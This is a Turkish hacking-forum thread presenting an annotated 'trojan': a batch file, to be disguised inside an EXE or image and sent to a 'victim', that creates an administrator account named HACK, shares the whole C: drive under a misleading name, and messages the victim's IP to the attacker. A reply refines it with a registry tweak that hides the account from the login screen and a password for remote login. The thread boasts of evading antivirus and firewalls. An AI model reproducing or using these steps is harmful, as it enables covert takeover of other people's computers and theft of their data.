İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

açıklamalı tojan

17-01-2016 09:36
#1
404 found - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
ankara
Mesajlar:
1.072
Teşekkür (Etti):
55
Teşekkür (Aldı):
69
Konular:
65
Yeniyim paylaşan var mı bilmiyorum
Öncelikle bir TXT dosyasi acin ve icine su komutu girin;

net user HACK /add

Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz;

2-) Simdi yukaridaki komutun hemen bir alt satirina gecin ve su komutu ekleyin;

net localgroup administrators HACK /add

Böylece "HACK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik "HACK" hesabimiz tüm yetkilere sahip.

3-) Simdi de kurbanimizin makinasindaki C: sürücüsünü sınırsız paylasima acacagiz. Kurbani da huylandirmamak icin paylasim adini SYSTEM olarak set edecegiz. Bunun icin asagidaki komutu kullanacagiz;

net share system=C: /unlimited

Ewet artik Kurbanimizin makinasini sonuna kadar actik. Peki kurbanin IP sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK" hesabindan baglanacagiz?

Bunun icin de kodumuza bir satirlik bir komut daha ekleyecegiz;

4-) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.

4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.

Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.

net start Messenger

Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardisik sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi olur.
Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C: sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.

Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C: sürücüsüne sizar istediginizi yaparsiniz.

Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir.
Kullanıcı İmzası
Türkçülük ülküsü bizden amansız bir görev ahlakı istiyor.
zztri Teşekkür etti.

17-01-2016 10:03
#2
zztri - ait Kullanıcı Resmi (Avatar)
Geliştirici
Üyelik tarihi:
07/2015
Nereden:
Ankara
Mesajlar:
9.356
Teşekkür (Etti):
1766
Teşekkür (Aldı):
3959
Konular:
68
Başka yerde paylaşıldığını görmüştüm. Sorunlar var bu sistemde;

İlk olarak, karşı tarafın router'ı senin NET SEND'leri de, NET VIEW'ları da hedef bilgisayara aktarmayacak. Yani router arkasındaki bir elemanda eğer portları açmak için ekstra bir çaba sarfetmezsen bunu kullanamazsın. Ama aynı network içinde iken hala işe yarar.

İkincisi, net send tamamen kaldırıldı. Yani artık manuel açılış da değil, disabled da değil. Öyle bir servis yok. Ama bu konuda anlatılanları yapabilen adam, başka şekilde bu makinenin IP'sini alır. Yani bu büyük bir sorun değil.

Son sorun, makine bir daha açıldığında, adam login ekranında kendi kullanıcısı yanında bir tane de HACK kullanıcısı görecek. Loginden saklamak lazım bu kullanıcıyı. Bunun için de;

- HKLM\software\microsoft\windows nt\currentversion\ içinde SpecialAccounts\UserList yoksa bu key'i oluşturuyoruz. İçine HACK yazıp değer olarak da DWORD olarak 0 yazıyoruz. Bu hesap artık özel olarak aramadıkça görünmez. Bunu bir .reg dosyası haline getirip hızlıca çalıştırabiliriz.

Gene de öğrenilmesi gereken, güzel özellikler. Sitelere, kişisel bilgisayarlara değil de zaten içinde olduğunuz sistemlere saldırırken yararlı olur.

Edit: Bu önemli.. Artık şifresi olmayan kullanıcı admin bile olsa, o kullanıcıya uzaktan bağlanılamaz. net user HACK <şifre> /add demeliyiz ki uzaktan bağlanalım.
Kullanıcı İmzası
Gayrıresmi Trolleme Kulübü Kurucu Üyesi...

Sii Şarp: 430%
Site yapmah: 386%
Piieyçpii: 396.8%
Cava: 205%
Andıroyid: 37.9²%
Nodjiies: 196%
Sii artı artı: 342.333333334%
Yuniti: 154%
Paytın 304%
Bat dosyasıyla hedef çökertme: 96i+382√17%
Konu zztri tarafından (17-01-2016 10:08 Saat 10:08 ) değiştirilmiştir.
404 found Teşekkür etti.
17-01-2016 12:28
#3
404 found - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
ankara
Mesajlar:
1.072
Teşekkür (Etti):
55
Teşekkür (Aldı):
69
Konular:
65
Alıntı:
zztri´isimli üyeden Alıntı Mesajı göster
Başka yerde paylaşıldığını görmüştüm. Sorunlar var bu sistemde;

İlk olarak, karşı tarafın router'ı senin NET SEND'leri de, NET VIEW'ları da hedef bilgisayara aktarmayacak. Yani router arkasındaki bir elemanda eğer portları açmak için ekstra bir çaba sarfetmezsen bunu kullanamazsın. Ama aynı network içinde iken hala işe yarar.

İkincisi, net send tamamen kaldırıldı. Yani artık manuel açılış da değil, disabled da değil. Öyle bir servis yok. Ama bu konuda anlatılanları yapabilen adam, başka şekilde bu makinenin IP'sini alır. Yani bu büyük bir sorun değil.

Son sorun, makine bir daha açıldığında, adam login ekranında kendi kullanıcısı yanında bir tane de HACK kullanıcısı görecek. Loginden saklamak lazım bu kullanıcıyı. Bunun için de;

- HKLM\software\microsoft\windows nt\currentversion\ içinde SpecialAccounts\UserList yoksa bu key'i oluşturuyoruz. İçine HACK yazıp değer olarak da DWORD olarak 0 yazıyoruz. Bu hesap artık özel olarak aramadıkça görünmez. Bunu bir .reg dosyası haline getirip hızlıca çalıştırabiliriz.

Gene de öğrenilmesi gereken, güzel özellikler. Sitelere, kişisel bilgisayarlara değil de zaten içinde olduğunuz sistemlere saldırırken yararlı olur.

Edit: Bu önemli.. Artık şifresi olmayan kullanıcı admin bile olsa, o kullanıcıya uzaktan bağlanılamaz. net user HACK <şifre> /add demeliyiz ki uzaktan bağlanalım.

Öncelikle yorumun için teşekkür ederim 1.'si yeniyim görmedim 2.'si ise zaten biz bundan çok bi randıman beklemiyoruz çok eskiden denemiştim olmuştu bnde yazıyım dedim
Kullanıcı İmzası
Türkçülük ülküsü bizden amansız bir görev ahlakı istiyor.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı